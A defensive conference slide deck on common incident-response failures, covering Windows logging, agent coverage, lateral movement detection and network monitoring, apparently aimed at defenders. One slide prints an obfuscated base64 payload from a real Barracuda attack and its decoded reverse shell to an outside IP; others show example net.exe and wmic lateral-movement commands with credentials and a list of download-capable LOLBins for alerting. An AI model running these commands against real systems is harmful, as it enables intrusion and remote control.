SlideShare a Scribd company logo
1 of 52
Presented by: Michael Gough
Incident Response Fails
What we see with our
clients, and their fails
WHOAMI
2 Public Consumption
Blue Team Defender Ninja, Malware Archaeologist, Logoholic and
• Principal Incident Response Engineer for
I love “properly” configured logs – they tell us Who, What, Where, When and hopefully How
Creator of
“Windows Logging Cheat Sheet”
“Windows File Auditing Cheat Sheet”
“Windows Registry Auditing Cheat Sheet”
“Windows Splunk Logging Cheat Sheet”
“Windows ATT&CK Logging Cheat Sheet”
“ARTHIR – ATT&CK Remote Threat Hunting Incident Response tool”
Co-Creator of:
“Log-MD” – Log Malicious Discovery Tool and
“File-MD” – Static file analysis scanner
WHOAMI
3 Public Consumption
Why this talk?
Learn from what we
see in the trenches
Avoid mistakes others
make
Being an Incident Responder
4 Public Consumption
• We get called when things get
• Clients want to know Who, What, Where, When, and How the
pwnage happened
• We all know why…
• So what do we consistently see with our clients? How are they
failing?
Level Set
5 Public Consumption
• Let us first define a few items
• Security 101 – Things you should always do, usually things
you already have and are FREE… well your time is needed
• Security 201 – Things you should have to “reduce” pwnage
and hopefully alert to suspicious activity
• Security 301 – Things you should be doing with your tools,
understand the gaps and address them with additional
tooling, process and/or procedures
• Security 501 – Doing things like Threat Hunting and being
proactive at seeking out the malicious behavior
This talk
6 Public Consumption
• This talk covers more of Security 101 and 201
• These are the things we see many, if not most
organizations are failing, forgot or did not continue
doing
• Organizations jump to Security 301 and forget to
continue Security 101 and 201
• This is the first #Fail we see
Public Consumption
The
Three C’s
The 3 Cs
8 Public Consumption
What do we see our clients fail at?
Configuration
Local audit logging not optimally configured
Endpoint agents not optimally configured
Coverage
Endpoints missing one or more agents
Some or all log data (endpoint, cloud, network, internet facing) not
going to a log management solution
Completeness
Implement a process to validate and verify Configuration and
Coverage is “Complete”
Completeness
9 Public Consumption
When you roll out an agent…
Do you...
1. Validate the agent was properly installed?
2. Compare it to a list of known assets?
• Do you even know where or what all your assets are?
3. Verify the data is collecting properly?
4. Have a way to identify new systems as they come live?
5. Have a way to install agents on new systems quickly?
6. Verify the endpoint configuration is showing up in the proper
console(s)… regularly?
Why the 3 C’s are important
10
Public Consumption
• Incident Responders need data to discover what happened
to the detail level we can be sure
• This is so our clients can improve and close the gap(s) of why
the pwnage happened or wasn’t detected
• To reduce the cost and time of an Incident Response
investigation is always a goal
• It can save you 2x to 4x the cost of paying an Incident
Response firm
• You could be way ahead… IF you prepare
The 3 ‘s are FREE
11
Public Consumption
• You don’t have to spend $$$ to improve procedures and
processes
• Or tweak some settings
• People time is a cost, but not an external spend
• So spend some time on Preparation…. It is in the P in the
SANS PICERL model
• Many of our clients have incomplete or broken agent installs
and endpoint configuration is not optimal
• This means incomplete coverage and configuration
• Thus missing details and potentially the initial compromise
Windows Audit Logs
12 Public Consumption
We check Windows systems for what logging is enabled before
we perform triage to know what will likely be there…
There is a freely available tool to check your Windows logs
against some well known Cheat Sheets ;-)
Hint..
Local Log Sizes are NOT Big Enough
13
Public Consumption
PowerShell Logging is inadequate
1 Public Consumption
• PowerShell is used a lot in all kinds of attacks
• Commodity, Ransomware, APT
• Command Line details missing
• ScriptBlock Logging improperly or not set
Audit Settings Fail
15 Public Consumption
• We need the data enabled and retained for a week or longer
WHOAMI
16
Public Consumption
• IF… Prevention worked so well
• THEN… Why are we having more pwnage than ever before?
• Can we change the term to something more realistic?
• Let’s consider it “Reduction”
• Now we can look at how we can reduce the likelihood, effort,
time, damage, costs, etc…
• Because we have not succeeded in preventing events
Threat Hunting
17
Public Consumption
• It’s all the rage
• Before you can do Threat Hunting and expect to actually find
anything
• You need to solve the 3 C’s and have one or more methods or
solutions to hunt with
• Fancy EDR Threat Hunting solution
• Or better yet a log management solution
• That collects all the “right” things
Threat Hunting
18
Public Consumption
• Our clients want to do it
• But the data is not enabled or being collected that is needed to
perform any decent hunting
• Same goes for performing Incident Response
• You need the data or we can’t do the best job as fast as we like
• Time is Money
Client Confidential
So what are
we seeing out
there?
Lack of Process Details
20
Public Consumption
• Why is EDR better than Anti-Virus?
• For one thing it looks at the parameters and associations of an
execution
• The details tell us WHAT the Bad Actor(s) are actually doing
• But EDR falls short on all the details as it tends to be execution
based, some have comms too
• But EDR alone is not enough
Some Clients Have EDR
21
Public Consumption
• Is it stopping all the attacks?
• No
• Does it see part of the attack?
• Yes
• Will I get all the details I need to investigate
• Probably not, depends on the solution
• Authentication monitoring is not common in EDR solutions, so lateral
movement is not detected until execution of something known bad
occurs
Anti-Virus NOT Being Used Well
22 Public Consumption
• We see clients with multiple AV solutions
• Why is this bad?
• Because getting the alert details into one place, like a Log
Management solution can be a pain for many AV solutions
• You need connectors to pull the data into your log
management
• We see Microsoft Defender alerts in the local logs, but no one
is looking or collecting it
Anti-Virus NOT Being Used Well
23
Public Consumption
• If a local log is available, use it!
• Collect the Defender Logs for the following Event IDs
• 1006, 1009, 1116, 1117, 1119
• Only created when it finds something, so low noise, high return
if you collect and alert on them
• We find one or more systems see a piece of an attack in the
Defender logs, but no one looked, so it was missed
Ransomware
24
Public Consumption
• Have you heard of this “new” attack?
• Most are due to passwords being compromised and then
logging into Internet facing systems, like RDP
• Some by emailed payloads or links
• Detection is very poor
• Solution that detects/stops the brute login not present
• Solution that detects/stops the mass encryption not present
Client Confidential
Login Attempts
26
Public Consumption
Massive Login Attempts
• From the host being investigated
• We see 20, 40, 60… failed logins to an endpoint or device
• No alerting for obvious places failed login attempts in
mass should NOT be
• Failed logins provide the source IP and sometimes name
of the source attacking/attempting device
• Easy alert, IF endpoint data is being collected
• Most do not collect user endpoint login data
• Too bad as local logins to a host for a domain user are
rare
Lateral Movement
27
Public Consumption
• Lateral Movement
• From the host being investigated
• Bad guys use several methods, this is just one example
• Net.exe, Net1.exe
• You see 20 of these ‘net.exe’ in the logs, so what did they
actually do?
• NO Process Command Line being collected
• Which means there are no details, and much more work
to discover Where they went
Lateral Movement Details
28
Public Consumption
Net.exe - devil IS in the details
• WHAT Server/Workstation?
• WHAT Share?
• WHAT User?
• IF Process Command Line was being collected then you would see….
Net.exe Secret-ServerCredit-Cards /u:SuperDomainUser /p:Password123
BIG Difference
2 Public Consumption
Now if there were 20 of these events in the logs
• We would now know:
• What systems were connected to
• What shares, thus what data was exposed and possibly taken
• What user account(s) got pwned
• As an Incident Responder I now have more targets to investigate because I
KNOW they logged into these specific systems!
• GREAT Resource by JPCert on Lateral Movement
• https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf
Save Your Sanity, Time, And Job
3 Public Consumption
• IF you collect the details, we can investigate in minutes/hours versus
days/weeks
• This equates to real $$$ saved
• Since time is money
• NIX and macOS ‘history’ of course we need too
NIX Example – Barracuda Email CVE-2023-2868
3 Public Consumption
• NIX and macOS ‘history’ of course we need too
• --Begin Encoded Payload--
• '`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW
50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6ODA4MCA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvc
CI=;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'
• --End Encoded Payload--
• The encoded block above decodes to a reverse shell seen below.
• --Begin Decoded Command--
• setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -
connect 107[.]148[.]223[.]196:8080 >/tmp/p 2>/dev/null;rm /tmp/p"
• --End Decoded Command--
More Lateral Movement
3 Public Consumption
• WMI is also used and does not log well
• Look for “/user:” and /password
• Remote WMI connections have a unique dual auth with Windows 10
and above, so look for these as sure fire indications of remote WMI
pwnage
• See my DerbyCon 2018 presentation
• https://www.irongeek.com/i.php?page=videos/derbycon8/track-3-03-detecting-wmi-
exploitation-michael-gough
wmic /user:"FOREIGN_DOMAINAdmin" /password:"Password" /node:192.168.1.2 group list brief
More Lateral Movement
33
Public Consumption
• Windows Remote Management (WinRM)
– PowerShell Remoting
• So VERY Powerful
• Just enable and go anywhere
• This is a bit different as we need to collect a different log
• Applications and Services Logs
– Microsoft-Windows-Windows-Remote-Management/Operational
More Lateral Movement
34
Public Consumption
• You do need to configure the endpoint
• Bad Actors use WMI to remotely execute:
• winrm qc
• Now PowerShell is being heavily used
• Little on the Process Command Line as far as PowerShell details
• What about WinRM Logs?
• What about PowerShell Logs?
WinRM Has Logs
35
Public Consumption
• Event ID 6 (Host/attacker) and 91 (Target) will give you a
list of systems that are connected to
PowerShell Has Logs
36 Public Consumption
• Event ID 4104 will show you the PowerShell command(s) used to
connect
• Enter-PSSession <hostname> …
• Event ID 4103 will show you details against the Target system(s)
Client Confidential
What about
the
Network ?
Network Fails
3 Public Consumption
• Outbound traffic from servers
• Most have the infamous ANY/ANY outbound
• No basic detection or alerts for odd ports or NEW IPs
• TOR uses 80 and 443, but also others
• 4443, 9001, 9030, 9040, 9050, 9051, and 9150
• What about Countries or Network Owners of the outbound IPs?
• No baseline of normal traffic
Client Confidential
So where
do you start?
Capabilities Assessment
40
Public Consumption
• In the SANS PICERL model the last item is ‘Lesson Learned’
• So apply Post-Mortem to Pre-Mortem
• We call this a Capability Assessment
• What is my Incident Response capability to detect an attack and
respond quickly?
• Am I collecting the right things?
• Do I have an idea how long the data is collecting for?
• Where is the data located?
Capability Assessment
41 Public Consumption
• You have to understand what data you have, how long it is collecting
for and WHERE the data resides
• You will need to break glass with an IR firm before this data rolls!
• You need a process to evaluate this data and length you have it for
• You may also need a process to collect or protect the data from rolling
out of the logs
Capability Assessment
42
Public Consumption
• By doing a Capability Assessment you can determine if the log data
you have is adequate for Incident Response and also Threat Hunting
• You can use a well-known framework to map what you have, or
should have to detect well known items used by the bad actors
• You can track the progress of what you are collecting and create
playbooks or runbooks as you verify your sources
MITRE ATT&CK
43
Public Consumption
• First - Everything you do should be mapped to MITRE ATT&CK -
https://attack.mitre.org/
• Some of the techniques used
• T1021.006 – Remote Service WinRM
• T1047 – WMI
• T1059.001 - Command and Scripting Interpreter: PowerShell
• T1218 - Signed Binary Proxy Execution
• Etc.
Watch for Downloading LOLBin/LOLBas
44 Public Consumption
• Malicious code has to be downloaded
• Advanced attackers and Red Teams will use the LOLBin and Scripts
LOLBaS to download the payload
• Alert on these
• Baseline the normal, there will NOT be many
• Watch these executions closely
• Process Command Line details are key!!!
LOLBin/LOLBas That Can Be Downloaded
45
Public Consumption
• powershell.exe
• bitsadmin.exe
• certutil.exe
• psexec.exe
• wmic.exe
• mshta.exe
• mofcomp.exe
• cmstp.exe
• windbg.exe
• cdb.exe
• msbuild.exe
• csc.exe
• regsvr32.exe
• Excel too !!!
Short list per Cisco Talos
• mshta.exe
• certutil.exe
• bitsadmin.exe
• regsvr32.exe
• powershell.exe
https://blog.talosintelligence.com/2019/11/hunting-for-lolbins.html
Process Command Line is KEY
Map to MITRE ATT&CK
Watch Your Traffic
46
Public Consumption
• It is time to setup some basic network monitoring as a part of Security
101
• Alert on ALL non 80/443 ports from internal servers
• Of course 53, 22, 25, 465, 587, 1433, 3306 will be normal ports too,
every org will have other ports
• Look at the Network owner of the IPs and exclude the CIDR of
known/trusted owners
• Servers should not be overly complicated for outbound traffic IF they
are not on the Internet
Watch Your Traffic
47
Public Consumption
• Of course Internet facing servers are a bit different
• Create a procedure to lookup the Country and Network Owner and
build a normal pattern if you can for outbound traffic
• Create a way to validate IPs
• We will during an event
• We will process LOTS of IPs
• Of course you need to enable source IP logging
• AWS Flow Logs - PLEASE
Internet Facing Systems
48 Public Consumption
• How many Internet facing devices had remote vulnerabilities that got
pwned in the last year or two?
• It IS time to make sure the logging on Internet facing systems are
collecting locally at a minimum
• Know how long the data will exist or roll off
• Focus on having the following data in the logs
• Source IP (WHERE)
• Country origin option (log mgmt. usually has this)
• Authentication information (WHO)
Client Confidential
CONCLUSION
Conclusion
50
Public Consumption
• Learn from these typical failures
• Configure your logging
• Cover ALL your assets
• Verify the Completeness
• Watch for the items in this talk
• And several other of my talks
Practice Security 101 and 201 even if you are all the way to 501 or
beyond
Resources
51
Public Consumption
• Websites
• Log-MD.com The tools
• ARTHIR.com Free on GitHub
• The “Windows Logging Cheat Sheet(s)”
• https://MalwareArchaeology.com/cheat-sheets
• MITRE ATT&CK is your friend
• https://attack.mitre.org/techniques/enterprise/
• JPCert Detecting Lateral Movement
• https://www.jpcert.or.jp/english/pub/sr/20170612ac-
ir_research_en.pdf
• This presentation and others on SlideShare
• Search for MalwareArchaeology or LOG-MD
Questions?
52
Public Consumption
You can find us at:
• NCCGroup.com
• MalwareArchaeology.com
• TIME FOR HALLWAY CON !!!

More Related Content

What's hot

Web Application Security Testing
Web Application Security TestingWeb Application Security Testing
Web Application Security TestingMarco Morana
 
Security in CI/CD Pipelines: Tips for DevOps Engineers
Security in CI/CD Pipelines: Tips for DevOps EngineersSecurity in CI/CD Pipelines: Tips for DevOps Engineers
Security in CI/CD Pipelines: Tips for DevOps EngineersDevOps.com
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
6. Security Assessment and Testing
6. Security Assessment and Testing6. Security Assessment and Testing
6. Security Assessment and TestingSam Bowne
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples42Crunch
 
DevSecOps Training Bootcamp - A Practical DevSecOps Course
DevSecOps Training Bootcamp - A Practical DevSecOps CourseDevSecOps Training Bootcamp - A Practical DevSecOps Course
DevSecOps Training Bootcamp - A Practical DevSecOps CourseTonex
 
1. Mobile Application (In)security
1. Mobile Application (In)security1. Mobile Application (In)security
1. Mobile Application (In)securitySam Bowne
 
API Security Best Practices & Guidelines
API Security Best Practices & GuidelinesAPI Security Best Practices & Guidelines
API Security Best Practices & GuidelinesPrabath Siriwardena
 
Next Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMNext Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMBGA Cyber Security
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityAmazon Web Services
 
Single sign on - SSO
Single sign on - SSOSingle sign on - SSO
Single sign on - SSOAjit Dadresa
 
OpenAM - An Introduction
OpenAM - An IntroductionOpenAM - An Introduction
OpenAM - An IntroductionForgeRock
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
 

What's hot (20)

Web Application Security Testing
Web Application Security TestingWeb Application Security Testing
Web Application Security Testing
 
Security in CI/CD Pipelines: Tips for DevOps Engineers
Security in CI/CD Pipelines: Tips for DevOps EngineersSecurity in CI/CD Pipelines: Tips for DevOps Engineers
Security in CI/CD Pipelines: Tips for DevOps Engineers
 
Threat Modelling
Threat ModellingThreat Modelling
Threat Modelling
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang Bhatnagar
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 
6. Security Assessment and Testing
6. Security Assessment and Testing6. Security Assessment and Testing
6. Security Assessment and Testing
 
SSO introduction
SSO introductionSSO introduction
SSO introduction
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples
 
DevSecOps Training Bootcamp - A Practical DevSecOps Course
DevSecOps Training Bootcamp - A Practical DevSecOps CourseDevSecOps Training Bootcamp - A Practical DevSecOps Course
DevSecOps Training Bootcamp - A Practical DevSecOps Course
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation  Red Pill2017How fun of privilege escalation  Red Pill2017
How fun of privilege escalation Red Pill2017
 
1. Mobile Application (In)security
1. Mobile Application (In)security1. Mobile Application (In)security
1. Mobile Application (In)security
 
API Security Best Practices & Guidelines
API Security Best Practices & GuidelinesAPI Security Best Practices & Guidelines
API Security Best Practices & Guidelines
 
Next Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMNext Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAM
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS Security
 
OWASP Top Ten
OWASP Top TenOWASP Top Ten
OWASP Top Ten
 
Single sign on - SSO
Single sign on - SSOSingle sign on - SSO
Single sign on - SSO
 
C2S: What’s Next
C2S: What’s NextC2S: What’s Next
C2S: What’s Next
 
OpenAM - An Introduction
OpenAM - An IntroductionOpenAM - An Introduction
OpenAM - An Introduction
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
 

Similar to Incident Response Fails

When Security Tools Fail You
When Security Tools Fail YouWhen Security Tools Fail You
When Security Tools Fail YouMichael Gough
 
How to Leverage Log Data for Effective Threat Detection
How to Leverage Log Data for Effective Threat DetectionHow to Leverage Log Data for Effective Threat Detection
How to Leverage Log Data for Effective Threat DetectionAlienVault
 
SpiceWorks Webinar: Whose logs, what logs, why logs
SpiceWorks Webinar: Whose logs, what logs, why logs  SpiceWorks Webinar: Whose logs, what logs, why logs
SpiceWorks Webinar: Whose logs, what logs, why logs AlienVault
 
CNIT 121: 6 Discovering the Scope of the Incident & 7 Live Data Collection
CNIT 121: 6 Discovering the Scope of the Incident & 7 Live Data CollectionCNIT 121: 6 Discovering the Scope of the Incident & 7 Live Data Collection
CNIT 121: 6 Discovering the Scope of the Incident & 7 Live Data CollectionSam Bowne
 
CNIT 152: 6 Scoping & 7 Live Data Collection
CNIT 152: 6 Scoping & 7 Live Data CollectionCNIT 152: 6 Scoping & 7 Live Data Collection
CNIT 152: 6 Scoping & 7 Live Data CollectionSam Bowne
 
[CB20] Keynote2:Practical and Intelligent Incident Response Planning by Russ ...
[CB20] Keynote2:Practical and Intelligent Incident Response Planning by Russ ...[CB20] Keynote2:Practical and Intelligent Incident Response Planning by Russ ...
[CB20] Keynote2:Practical and Intelligent Incident Response Planning by Russ ...CODE BLUE
 
Six Mistakes of Log Management 2008
Six Mistakes of Log Management 2008Six Mistakes of Log Management 2008
Six Mistakes of Log Management 2008Anton Chuvakin
 
CNIT 152: 6. Scope & 7. Live Data Collection
CNIT 152: 6. Scope & 7. Live Data CollectionCNIT 152: 6. Scope & 7. Live Data Collection
CNIT 152: 6. Scope & 7. Live Data CollectionSam Bowne
 
6 Scope & 7 Live Data Collection
6 Scope & 7 Live Data Collection6 Scope & 7 Live Data Collection
6 Scope & 7 Live Data CollectionSam Bowne
 
CNIT 152: 4 Starting the Investigation & 5 Leads
CNIT 152: 4 Starting the Investigation & 5 LeadsCNIT 152: 4 Starting the Investigation & 5 Leads
CNIT 152: 4 Starting the Investigation & 5 LeadsSam Bowne
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFMichael Gough
 
TACOM 2014: Back To Basics
TACOM 2014: Back To BasicsTACOM 2014: Back To Basics
TACOM 2014: Back To BasicsJoel Cardella
 
CNIT 121: 2 IR Management Handbook
CNIT 121: 2 IR Management HandbookCNIT 121: 2 IR Management Handbook
CNIT 121: 2 IR Management HandbookSam Bowne
 
Devoxx Belgium 2022 - Debugging distributed systems
Devoxx Belgium 2022 - Debugging distributed systemsDevoxx Belgium 2022 - Debugging distributed systems
Devoxx Belgium 2022 - Debugging distributed systemsBert Jan Schrijver
 
Arnhem JUG March 2023 - Debugging distributed systems
Arnhem JUG March 2023 - Debugging distributed systemsArnhem JUG March 2023 - Debugging distributed systems
Arnhem JUG March 2023 - Debugging distributed systemsBert Jan Schrijver
 
Identify and Stop Insider Threats
Identify and Stop Insider ThreatsIdentify and Stop Insider Threats
Identify and Stop Insider ThreatsLancope, Inc.
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion DetectionAPNIC
 

Similar to Incident Response Fails (20)

When Security Tools Fail You
When Security Tools Fail YouWhen Security Tools Fail You
When Security Tools Fail You
 
How to Leverage Log Data for Effective Threat Detection
How to Leverage Log Data for Effective Threat DetectionHow to Leverage Log Data for Effective Threat Detection
How to Leverage Log Data for Effective Threat Detection
 
SpiceWorks Webinar: Whose logs, what logs, why logs
SpiceWorks Webinar: Whose logs, what logs, why logs  SpiceWorks Webinar: Whose logs, what logs, why logs
SpiceWorks Webinar: Whose logs, what logs, why logs
 
CNIT 121: 6 Discovering the Scope of the Incident & 7 Live Data Collection
CNIT 121: 6 Discovering the Scope of the Incident & 7 Live Data CollectionCNIT 121: 6 Discovering the Scope of the Incident & 7 Live Data Collection
CNIT 121: 6 Discovering the Scope of the Incident & 7 Live Data Collection
 
CNIT 152: 6 Scoping & 7 Live Data Collection
CNIT 152: 6 Scoping & 7 Live Data CollectionCNIT 152: 6 Scoping & 7 Live Data Collection
CNIT 152: 6 Scoping & 7 Live Data Collection
 
[CB20] Keynote2:Practical and Intelligent Incident Response Planning by Russ ...
[CB20] Keynote2:Practical and Intelligent Incident Response Planning by Russ ...[CB20] Keynote2:Practical and Intelligent Incident Response Planning by Russ ...
[CB20] Keynote2:Practical and Intelligent Incident Response Planning by Russ ...
 
Six Mistakes of Log Management 2008
Six Mistakes of Log Management 2008Six Mistakes of Log Management 2008
Six Mistakes of Log Management 2008
 
CNIT 152: 6. Scope & 7. Live Data Collection
CNIT 152: 6. Scope & 7. Live Data CollectionCNIT 152: 6. Scope & 7. Live Data Collection
CNIT 152: 6. Scope & 7. Live Data Collection
 
Insider threat v3
Insider threat v3Insider threat v3
Insider threat v3
 
6 Scope & 7 Live Data Collection
6 Scope & 7 Live Data Collection6 Scope & 7 Live Data Collection
6 Scope & 7 Live Data Collection
 
CNIT 152: 4 Starting the Investigation & 5 Leads
CNIT 152: 4 Starting the Investigation & 5 LeadsCNIT 152: 4 Starting the Investigation & 5 Leads
CNIT 152: 4 Starting the Investigation & 5 Leads
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDF
 
TACOM 2014: Back To Basics
TACOM 2014: Back To BasicsTACOM 2014: Back To Basics
TACOM 2014: Back To Basics
 
CNIT 121: 2 IR Management Handbook
CNIT 121: 2 IR Management HandbookCNIT 121: 2 IR Management Handbook
CNIT 121: 2 IR Management Handbook
 
Devoxx Belgium 2022 - Debugging distributed systems
Devoxx Belgium 2022 - Debugging distributed systemsDevoxx Belgium 2022 - Debugging distributed systems
Devoxx Belgium 2022 - Debugging distributed systems
 
Arnhem JUG March 2023 - Debugging distributed systems
Arnhem JUG March 2023 - Debugging distributed systemsArnhem JUG March 2023 - Debugging distributed systems
Arnhem JUG March 2023 - Debugging distributed systems
 
Identify and Stop Insider Threats
Identify and Stop Insider ThreatsIdentify and Stop Insider Threats
Identify and Stop Insider Threats
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection
 
Software Security and IDS.pptx
Software Security and IDS.pptxSoftware Security and IDS.pptx
Software Security and IDS.pptx
 
Debugging distributed systems
Debugging distributed systemsDebugging distributed systems
Debugging distributed systems
 

More from Michael Gough

You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0Michael Gough
 
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolIntroducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolMichael Gough
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Michael Gough
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01Michael Gough
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacksMichael Gough
 
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1Michael Gough
 
Cred stealing emails bsides austin_2018 v1.0
Cred stealing emails bsides austin_2018 v1.0Cred stealing emails bsides austin_2018 v1.0
Cred stealing emails bsides austin_2018 v1.0Michael Gough
 
InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0Michael Gough
 
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?Michael Gough
 
Email keeps getting us pwned - Avoiding Ransomware and malware
Email keeps getting us pwned - Avoiding Ransomware and malwareEmail keeps getting us pwned - Avoiding Ransomware and malware
Email keeps getting us pwned - Avoiding Ransomware and malwareMichael Gough
 
Email keeps getting us pwned v1.1
Email keeps getting us pwned v1.1Email keeps getting us pwned v1.1
Email keeps getting us pwned v1.1Michael Gough
 
Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0Michael Gough
 
DIR ISF - Email keeps getting us pwned v1.1
DIR ISF - Email keeps getting us pwned v1.1DIR ISF - Email keeps getting us pwned v1.1
DIR ISF - Email keeps getting us pwned v1.1Michael Gough
 
Email keeps getting us pwned v1.0
Email keeps getting us pwned v1.0Email keeps getting us pwned v1.0
Email keeps getting us pwned v1.0Michael Gough
 
Sandbox vs manual analysis v2.1
Sandbox vs manual analysis v2.1Sandbox vs manual analysis v2.1
Sandbox vs manual analysis v2.1Michael Gough
 
What can you do about ransomware
What can you do about ransomwareWhat can you do about ransomware
What can you do about ransomwareMichael Gough
 
Mw arch mac_tips and tricks v1.0
Mw arch mac_tips and tricks v1.0Mw arch mac_tips and tricks v1.0
Mw arch mac_tips and tricks v1.0Michael Gough
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSMichael Gough
 
Logging for hackers SAINTCON
Logging for hackers SAINTCONLogging for hackers SAINTCON
Logging for hackers SAINTCONMichael Gough
 

More from Michael Gough (20)

You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0
 
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolIntroducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacks
 
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
 
Cred stealing emails bsides austin_2018 v1.0
